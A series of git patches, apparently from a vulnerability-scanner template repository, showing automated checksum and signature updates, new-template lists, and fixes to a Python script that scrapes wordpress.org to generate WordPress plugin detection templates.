ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:86bac7e8379bf85b45635c5c2ba0558fa72032eb +templates-checksum.txt:1e1d1e742a552a18aa4600963e6028c4f540ba75 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cadf094589cad5ac4818c1d443aa5792ac5fc8bb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 13:11:11 +0000 Subject: [PATCH 0360/1841] Auto Template Signing [Tue Jun 18 13:11:11 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1561.yaml | 1 + http/cves/2024/CVE-2024-27718.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 9d02bce5b1..121d42149c 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -75,3 +75,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d26a144630e68bc8d64abcccd82c53e14154407cbcf7058289120c90ce084843022100ad2abb54f6a71476ef38fc22bad77ecafebbd737a9c4e6ee6393d9b248ac30cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-27718.yaml b/http/cves/2024/CVE-2024-27718.yaml index 7f980a8ee7..af1d4847a3 100644 --- a/http/cves/2024/CVE-2024-27718.yaml +++ b/http/cves/2024/CVE-2024-27718.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100ac317e1ecec2053960700ee389482ef23a2def68d0857dd2aa34ba292cf1fb3002200757a4af78313e507aeb9991d18c8cddb5f78341f409ec91f18298c3bf3eec3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8159bc0010f02dfe6c07f044ee18bda9fe388286 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 13:11:32 +0000 Subject: [PATCH 0362/1841] Auto Generated Templates Checksum [Tue Jun 18 13:11:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 82a8cd0211..035a78ecac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3444,7 +3444,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 -http/default-logins/mantisbt/mantisbt-default-credential.yaml:65733eb5b04675c93e8dd72407a64aacc1fd7243 +http/default-logins/mantisbt/mantisbt-default-credential.yaml:4f24bfa6b919c6d2096aa49a38eeda1b6a974d2a http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 http/default-logins/mofi/mofi4500-default-login.yaml:506eeab67f08aebd2f946b5c253936b4a2fac05c @@ -8663,7 +8663,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1e1d1e742a552a18aa4600963e6028c4f540ba75 +templates-checksum.txt:51f2820f5451f2682bacf18a45c695cbfeee6203 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 56ec740cec1bd54552db1d2e089087bebbb306c9 Mon Sep 17 00:00:00 2001 From: y0no <y.onoditbiot@attineos-cyber.com> Date: Tue, 18 Jun 2024 17:17:46 +0200 Subject: [PATCH 0363/1841] Fix wordpress plugins update script --- .github/scripts/wordpress-plugins-update.py | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index da31e5e898..7427894ebb 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -28,9 +28,10 @@ regex = r"https://wordpress.org/plugins/(\w.+)/" ranking = 1 # Top 200 Wordpress Plugins -for page_number in range(1, 11): +for page_number in range(2, 11): - html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={ + print(f"https://wordpress.org/plugins/browse/popular/page/{page_number}/") + html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}/", headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate", @@ -43,8 +44,8 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find(id="main") - articles = results.find_all("article", class_="plugin-card") + results = soup.find(class_="plugin-cards") + articles = results.find_all("div", class_="plugin-card") # Setting the top tag top_tag = "top-100,top-200" if page_number <= 5 else "top-200" From 8e9ad033b2bba91077ebedd6f7fe7f295ea6ed2c Mon Sep 17 00:00:00 2001 From: y0no <y.onoditbiot@attineos-cyber.com> Date: Tue, 18 Jun 2024 17:21:19 +0200 Subject: [PATCH 0364/1841] Fix wordpress plugins update script --- .github/scripts/wordpress-plugins-update.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 7427894ebb..cb4da11682 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -28,7 +28,7 @@ regex = r"https://wordpress.org/plugins/(\w.+)/" ranking = 1 # Top 200 Wordpress Plugins -for page_number in range(2, 11): +for page_number in range(1, 11): print(f"https://wordpress.org/plugins/browse/popular/page/{page_number}/") html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}/", headers={ From 4d1c505aa43516721f90526d46ccb498321f5b5f Mon Sep 17 00:00:00 2001 From: y0no <y.onoditbiot@attineos-cyber.com> Date: Tue, 18 Jun 2024 17:22:09 +0200 Subject: [PATCH 0365/1841] Remove debug line --- .github/scripts/wordpress-plugins-update.py | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index cb4da11682..91f51adc17 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -30,7 +30,6 @@ ranking = 1 # Top 200 Wordpress Plugins for page_number in range(1, 11): - print(f"https://wordpress.org/plugins/browse/popular/page/{page_number}/") html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}/", headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Accept-Language": "en-US,en;q=0.9", From c4854fc561abe9b7239062aacd507f9df8db6211 Mon Sep 17 00:00:00 2001 From: y0no <y.onoditbiot@attineos-cyber.com> Date: Tue, 18 Jun 2024 17:23:08 +0200 Subject: [PATCH 0366/1841] Remove trailing slash from URL --- .github/scripts/wordpress-plugins-update.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 91f51adc17..4d57c1873b 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -30,7 +30,7 @@ ranking = 1 # Top 200 Wordpress Plugins for page_number in range(1, 11): - html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}/", headers={ + html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate", From e14722ccd78e612f5e3bf819075506c05913eafe Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 18 Jun 2024 20:35:49 +0400 Subject: [PATCH 0367/1841] Update wordpress-plugins-update.py --- .github/scripts/wordpress-plugins-update.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 4d57c1873b..ca094e5856 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -43,7 +43,7 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find(class_="plugin-cards") + results = soup.find(id="main") articles = results.find_all("div", class_="plugin-card") # Setting the top tag From 7d5d48304dc18926da985c5d67ddf5f043032130 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 18 Jun 2024 20:45:37 +0400 Subject: [PATCH 0368/1841] Update wordpress-plugins-update.py --- .github/scripts/wordpress-plugins-update.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index ca094e5856..90f00ff68d 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -43,8 +43,14 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find(id="main") - articles = results.find_all("div", class_="plugin-card") + results = soup.find("div", {"id": "main"}) + if results is None: + print("Failed to find the main plugin list. Check if the page structure has changed.") + continue + articles = results.find_all("article", class_="plugin-card") + if not articles: + print("No articles found on the page.") + continue # Setting the top tag top_tag = "top-100,top-200" if page_number <= 5 else "top-200" From a8b70a24ead18afb6f7fb8efa6bfabafb09579d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 18 Jun 2024 21:06:05 +0400 Subject: [PATCH 0369/1841] Update wordpress-plugins-update.py --- .github/scripts/wordpress-plugins-update.py | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 90f00ff68d..42d39bf12f 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -9,7 +9,7 @@ compares the detect version with the payload version. The generated template also includes the tags top-100 and top-200 allowing filtering. e.g. -nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com +nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com ''' __author__ = "ricardomaia" @@ -43,14 +43,9 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - results = soup.find("div", {"id": "main"}) - if results is None: - print("Failed to find the main plugin list. Check if the page structure has changed.") - continue - articles = results.find_all("article", class_="plugin-card") - if not articles: - print("No articles found on the page.") - continue + + results = soup.find(id="main") + articles = results.find_all("div", class_="plugin-card") # Setting the top tag top_tag = "top-100,top-200" if page_number <= 5 else "top-200" @@ -128,7 +123,7 @@ info: wpscan: https://wpscan.com/plugin/{name} tags: tech,wordpress,wp-plugin,{top_tag} -http: +requests: - method: GET path: @@ -169,7 +164,7 @@ http: work_dir = os.getcwd() print(f"Current working directory: {work_dir}") helper_dir = f"{work_dir}/helpers/wordpress/plugins" - template_dir = f"{work_dir}/http/technologies/wordpress/plugins" + template_dir = f"{work_dir}/technologies/wordpress/plugins" if not os.path.exists(helper_dir): os.makedirs(helper_dir) @@ -182,7 +177,7 @@ http: version_file.write(version) version_file.close() - template_path = f"http/technologies/wordpress/plugins/{name}.yaml" + template_path = f"technologies/wordpress/plugins/{name}.yaml" template_file = open(template_path, "w") # Dev environment template_file.write(template) template_file.close() From 3ab33502215f13e45e13e7ea74aca74ea7f24799 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 18 Jun 2024 21:12:30 +0400 Subject: [PATCH 0370/1841] Update wordpress-plugins-update.py --- .github/scripts/wordpress-plugins-update.py | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/.github/scripts/wordpress-plugins-update.py b/.github/scripts/wordpress-plugins-update.py index 42d39bf12f..4d57c1873b 100644 --- a/.github/scripts/wordpress-plugins-update.py +++ b/.github/scripts/wordpress-plugins-update.py @@ -9,7 +9,7 @@ compares the detect version with the payload version. The generated template also includes the tags top-100 and top-200 allowing filtering. e.g. -nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com +nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com ''' __author__ = "ricardomaia" @@ -43,8 +43,7 @@ for page_number in range(1, 11): # Parse HTML soup = BeautifulSoup(html, 'html.parser') - - results = soup.find(id="main") + results = soup.find(class_="plugin-cards") articles = results.find_all("div", class_="plugin-card") # Setting the top tag @@ -123,7 +122,7 @@ info: wpscan: https://wpscan.com/plugin/{name} tags: tech,wordpress,wp-plugin,{top_tag} -requests: +http: - method: GET path: @@ -164,7 +163,7 @@ requests: work_dir = os.getcwd() print(f"Current working directory: {work_dir}") helper_dir = f"{work_dir}/helpers/wordpress/plugins" - template_dir = f"{work_dir}/technologies/wordpress/plugins" + template_dir = f"{work_dir}/http/technologies/wordpress/plugins" if not os.path.exists(helper_dir): os.makedirs(helper_dir) @@ -177,7 +176,7 @@ requests: version_file.write(version) version_file.close() - template_path = f"technologies/wordpress/plugins/{name}.yaml" + template_path = f"http/technologies/wordpress/plugins/{name}.yaml" template_file = open(template_path, "w") # Dev environment template_file.write(template) template_file.close() From 228a050d1c567d0853cb958c106a71218d5ed2e4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:23:14 +0000 Subject: [PATCH 0371/1841] Auto Generated New Template Addition List [Tue Jun 18 17:23:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9a469af7b8..10289364c0 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2021/CVE-2021-43831.yaml http/cves/2023/CVE-2023-32068.yaml +http/cves/2023/CVE-2023-37645.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml http/cves/2023/CVE-2023-51449.yaml From c3d342479f00ed6cec6721fdd93455198a46cb31 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:23:20 +0000 Subject: [PATCH 0372/1841] Auto Generated Templates Checksum [Tue Jun 18 17:23:20 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 035a78ecac..8717058b2a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,7 +3274,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f -http/cves/2024/CVE-2024-1561.yaml:53b3228299aea173f6ab29568f10a35688b615ba +http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 @@ -3305,7 +3305,7 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27348.yaml:6af6e5ad3b0eae4fa48d1937d51d5a5b767395b5 http/cves/2024/CVE-2024-27497.yaml:b898a9ccd9f6528a3d1ad4b1b9660b12752104e1 http/cves/2024/CVE-2024-27564.yaml:0b9367bff756ebc5d7db5a742305272ac13f37b1 -http/cves/2024/CVE-2024-27718.yaml:3dc9d8fd8a0bc4155d74128d7f3361b95f71e848 +http/cves/2024/CVE-2024-27718.yaml:ac86c307164170bac70e3c668aa579e5fc4043f3 http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 @@ -7086,7 +7086,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:c1a1125160e2d31f05987458e120ab6723a4339b +http/technologies/waf-detect.yaml:e57b35fad18d333e4166fc5eeaf03d6d058d2f7d http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -8663,7 +8663,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:51f2820f5451f2682bacf18a45c695cbfeee6203 +templates-checksum.txt:516611c2a1a065cc5dab1f73c7e7a7217a0231b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b1c971de83703fdb893af4e5d9c71c99cffaa6b3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:24:01 +0000 Subject: [PATCH 0374/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 534ae7607a..9bb7b4300f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2021/CVE-2021-43831.yaml' - 'http/cves/2023/CVE-2023-32068.yaml' + - 'http/cves/2023/CVE-2023-37645.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' - 'http/cves/2023/CVE-2023-51449.yaml' From 2da74a8ffb315c24d90638fd97b8ae165c483c5c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:24:16 +0000 Subject: [PATCH 0375/1841] Auto Generated New Template Addition List [Tue Jun 18 17:24:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 10289364c0..0a10840a84 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2023/CVE-2023-51449.yaml http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml +http/cves/2024/CVE-2024-0939.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-2621.yaml From b9a862c4008f24cde6d47d9991530e98638bb5b1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:24:20 +0000 Subject: [PATCH 0376/1841] Auto Generated Templates Checksum [Tue Jun 18 17:24:20 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8717058b2a..333e050b52 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3106,6 +3106,7 @@ http/cves/2023/CVE-2023-37462.yaml:6b1f3970c1dc620fcedbcc081ecce0f3328b4e1f http/cves/2023/CVE-2023-37474.yaml:a6565d9a008a046e497384b2e3c54f2665ab21ce http/cves/2023/CVE-2023-37580.yaml:d81689caa2503f8ddaa833303e77e7d22e16d4d0 http/cves/2023/CVE-2023-37629.yaml:6b9aba73f2319467150cfdfb282cfb95d271174b +http/cves/2023/CVE-2023-37645.yaml:cc8d012c1a024cdac3dd2b43da630afe475a8e89 http/cves/2023/CVE-2023-3765.yaml:76901ccd6f1bd5832e4e665fa7253eed60353a99 http/cves/2023/CVE-2023-37679.yaml:3fd1560c8134ad5beee7f4c91164a5c38c28dbc8 http/cves/2023/CVE-2023-37728.yaml:00598b29b4b89548b3276da06fbb24bd84c3a748 @@ -3265,6 +3266,7 @@ http/cves/2024/CVE-2024-0337.yaml:4a573bdaf757a5eca3d9892d080c0ccc038119d7 http/cves/2024/CVE-2024-0352.yaml:f2f46e8a92d48c008e17233656b4941b3fc4c874 http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 +http/cves/2024/CVE-2024-0939.yaml:dcbc22947fa8b178ff21454caee1f1f229fb150d http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 http/cves/2024/CVE-2024-1061.yaml:96c95b4ca9238cb7c10740394d456ebb9259be24 http/cves/2024/CVE-2024-1071.yaml:c96b9ae1af3c57ad1d76138972e4ef609468f43c @@ -8663,7 +8665,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:516611c2a1a065cc5dab1f73c7e7a7217a0231b3 +templates-checksum.txt:9dff0eb24e0b63323acdafd9cbc118266c627c88 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a4d304317cf7852b2c0a4e6ebc3f43132ed2a179 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:25:00 +0000 Subject: [PATCH 0377/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9bb7b4300f..278579d16c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' + - 'http/cves/2024/CVE-2024-0939.yaml' - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-2621.yaml' From cfd9affc97eafa32a7348d2f0ede22ff0deca7ac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:25:03 +0000 Subject: [PATCH 0378/1841] Auto Template Signing [Tue Jun 18 17:25:03 UTC 2024] :robot: --- http/default-logins/mantisbt/mantisbt-default-credential.yaml | 1 + http/technologies/waf-detect.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/default-logins/mantisbt/mantisbt-default-credential.yaml b/http/default-logins/mantisbt/mantisbt-default-credential.yaml index 042edf3563..d84839470b 100644 --- a/http/default-logins/mantisbt/mantisbt-default-credential.yaml +++ b/http/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -72,3 +72,4 @@ http: part: header regex: - "PHPSESSID=([a-zA-Z0-9]+);" +# digest: 4a0a00473045022100e9313e62bc97fd81491c8d92e9f909ab7ba4f4c49f1d794199d318339d8311010220459bfd016362968c49d0b207937aae61ac49778a320268a82ecc84f46dd51891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index d4aac2ba32..eecfd778b8 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -746,5 +746,4 @@ http: - '(?)content="CloudWAF"' - 'Server: CloudWAF' - 'Set-Cookie: HWWAFSESID=' - -# digest: 4a0a00473045022100838ec30faf54beae55c2295a830c3dc6e714ac961e1ab16e8229c1877a1953070220144f12e7589f000ee757e652b2ec786c4d05f0b2a2379badc6eb20c52d60c3d1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205229eadf2567f1e73205f840656054fe2f167c6087611d957f79eeea3d1b2cd0022066ec38f2a9f60e5d2c1fc095899aade2bf1af5722bddd41d5e414b5c83979f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 24615a7e126830e35513b923c2af46680ca3ed31 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 18 Jun 2024 17:28:13 +0000 Subject: [PATCH 0379/1841] Auto Generated New Template Addition List [Tue Jun 18 17:28:13 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0a10840a84..9112576399 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-27718.yaml http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-31750.yaml +http/cves/2024/CVE-2024-31982.yaml http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-3274.yaml http/cves/2024/CVE-2024-36837.yaml From dba8c6c606dcb7592cb74b3638db2e1049b470e4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 18 Jun 2024 17:28:18 +0000 Subject: [PATCH 0380/1841] Auto Generated Templates Checksum [Tue Jun 18 17:28:18 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 333e050b52..3bae0c9aff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3325,6 +3325,7 @@ http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 +http/cves/2024/CVE-2024-31982.yaml:4983d6aa31324adc1b0090d6e4553f507bd4fd72 http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 @@ -3446,7 +3447,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 -http/default-logins/mantisbt/mantisbt-default-credential.yaml:4f24bfa6b919c6d2096aa49a38eeda1b6a974d2a +http/default-logins/mantisbt/mantisbt-default-credential.yaml:30f4e0ea9fb36172667235072e61ef734891ac9a 